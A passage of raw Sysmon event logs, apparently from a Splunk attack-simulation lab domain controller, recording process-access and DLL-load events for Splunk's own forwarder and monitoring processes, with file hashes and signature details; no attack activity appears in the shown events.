13:07:45.905{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100999Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-A252-6294-0500-000000005502}4161908C:\Windows\system32\csrss.exe{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000100998Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100997Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.906{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000100996Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.390{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F53179ACB6001660C6E1CD0472BA529,SHA256=A8CDFA6BF0156CBE3B98B9CE23737C2166BD63E93D531F97209DDB4B868D19F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000101100Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.921{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000101099Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.921{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000101098Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.921{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000101097Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.921{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000101096Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.921{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000101095Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.921{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000101094Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.921{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000101093Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.921{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000101092Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sspicli.dll10.0.14393.5006 (rs1_release.220301-1704)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521,IMPHASH=4B1C9487A6420C18F688F0EC5BEB6F33trueMicrosoft WindowsValid 734700x8000000000000000101091Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000101090Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000101089Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000101088Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x8000000000000000101087Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000101086Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000101085Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000101084Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000101083Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000101082Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000101081Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x8000000000000000101080Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000101079Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000101078Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000101077Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000101076Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000101075Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000101074Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000101073Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000101072Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000101071Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000101070Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27,IMPHASH=B01B7830101BC0D5FBDE4FFE2B170CF7trueMicrosoft WindowsValid 734700x8000000000000000101069Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x8000000000000000101068Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 734700x8000000000000000101067Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728B,IMPHASH=98738BA55485CCA932F6D222F47FFC55trueMicrosoft WindowsValid 734700x8000000000000000101066Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9,IMPHASH=3C043C6FF0F62DAEB8819606F79C5ECCtrueMicrosoft WindowsValid 734700x8000000000000000101065Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000101064Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x8000000000000000101063Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.905{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft 